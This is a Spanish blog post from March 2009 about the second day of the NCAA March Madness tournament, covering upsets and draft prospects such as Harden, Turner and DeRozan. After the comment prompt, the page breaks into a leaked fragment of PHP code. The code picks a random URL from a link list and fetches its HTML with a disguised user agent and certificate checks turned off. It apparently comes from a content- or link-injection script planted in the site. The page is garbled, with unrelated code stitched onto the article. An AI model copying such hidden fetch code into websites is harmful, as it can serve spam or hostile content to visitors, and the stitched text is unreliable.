Segunda jornada de la March Madness

21 de March de 2009 por txusma

Segunda jornada de March Madness y primeras sorpresas de las grandes: por un lado la eliminación de Wake Forest a manos de Cleveland State y por el otro la de Utah frente Arizona.

Era la segunda vez que Cleveland State disputaba la March Madness y como la vez anterior, también este año ha dado la campanada dejando en la cuneta a una universidad que cuenta entre sus filas con hasta 3 jugadores que aparecen en la primera ronda de los mocks del draft de este año. Jeff Teague, un base anotador que recuerda a Monta Ellis, Al-Farouq Aminu, un alero jovencísmo de grandes condiciones atléticas y James Johnson, un ala-pívot de baja estatura pero con un gran repertorio de opciones ofensivas, han tenido que ver como una universidad casi desconocida se ponía por delante en el marcador desde el primer minuto hasta el último gracias a una buena defensa y una gran veteranía. Johnson (22 puntos y 8 rebotes) y Aminu (17 puntos y 6 rebotes) han jugado un buen partido pero la falta de rigor defensivo y las continuas pérdidas han sentenciado a Wake Forest.

En segunda ronda, Cleveland State se enfrentará a Arizona, en lo que será un duelo casi histórico porque en muy pocas ocasiones se han visto las caras los equipos 12 y 13 de la misma división. Las cosas no empezaron bien para los Wildcats con sus 3 principales estrellas doloridas pero finalmente la calidad de Wise, Hill y Bundinger se impuso a la seriedad de Utah. Jordan Hill, ala-pívot que aparece el tercero en los mocks, anotó 17 puntos y recogió 13 rebotes y Chase Budinger, raza blanca tirador, contribuyó con 20 puntos y 8 rebotes.

Otro partido interesante para los aficionados, y más para los españoles, era el Arizona St. – Temple. Todos queríamos ver a James Harden, número 2 en los mocks, pero además los españoles teníamos el aliciente de presenciar el que podía ser el último partido en la NCCA del nuestro compatriota Sergio Olmos. La actuación del escolta de Arizona St.  ha sido decepcionante. Su defensor, Brooks, lo dejó en 9 puntos, con una serie de 1 de 8 en tiros de campo. Es cierto que como corresponde a un jefe de filas, se echó el equipo a sus espaldas cuando más difícil estaba el partido, anotando cuando más necesitaba aunque fuera forzando faltas. Aún así, se intuía hoy que Harden es un buen jugador capaz de anotar -hoy no, desde luego-, rebotear, asistir y defender. A pesar de los 29 puntos del jugador de Temple, Dionte Christmas, Arizona se llevo el duelo gracias a su efectividad en el tiro de media y larga distancia, donde destacó Derek Glasser. Sergio Olmos disputó 36 minutos, consiguiendo 8 puntos, 6 rebotes y 2 tapones.

Otro jugadores importante que saltaron ayer a la cancha fueron Evan Turner, BJ Mullens, ambos de Ohio State, y Demar DeRozan, alero de primer año de USC. A pesar de de aparecer los 3 como elecciones de primera ronda en los mocks, corrieron ayer suerte desigual. Ohio State calló eliminado frente Siena con un mal partido de Mullens que tan sólo anotó 10 puntos y capturó 3 rebotes, demostrando que posiblemente esté muy verde para dar el salto a la NBA. En cambio su compañero Evan TurnerEvan Turner cuajó un gran partido y con 25 puntos, 9 rebotes, 8 asistencias, 2 robos y 2 tapones completó la que puede ser una de las mejores actuaciones individuales del torneo. Habrá que vigiliar de cerca a este jugador capaz de jugar en cualquiera de las 3 posiciones exteriores. Por su parte, Demar DeRozan, contribuyó con 18 puntos y 9 rebotes a la victoria de los Trojans frente Boston College confirmando que acaba el año en buena forma tras un inicio de temporada muy decepcionante.

También ganaron DeJuan Blair de Pittsburgh y Jonny Flynn de Syracuse. Blair domina el interior en la NCAA por pura fuerza y determinación. Ayer acabó el partido con un impresionante 27-16 pero su paso a la NBA se antoja complicado. Con apenas 2 metros y sin aparentemente mucha envergadura parece difícil que pueda llegar a ser mucho más allá de un jugador de rotación que aporte intensidad. Por su parte, Jonny Flynn, uno de los mejores bases de la liga, comandó a los Orange a la siguiente ronda donde se verán las caras con el equipo de James Harden, en uno de los partidos más interesantes del domingo.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>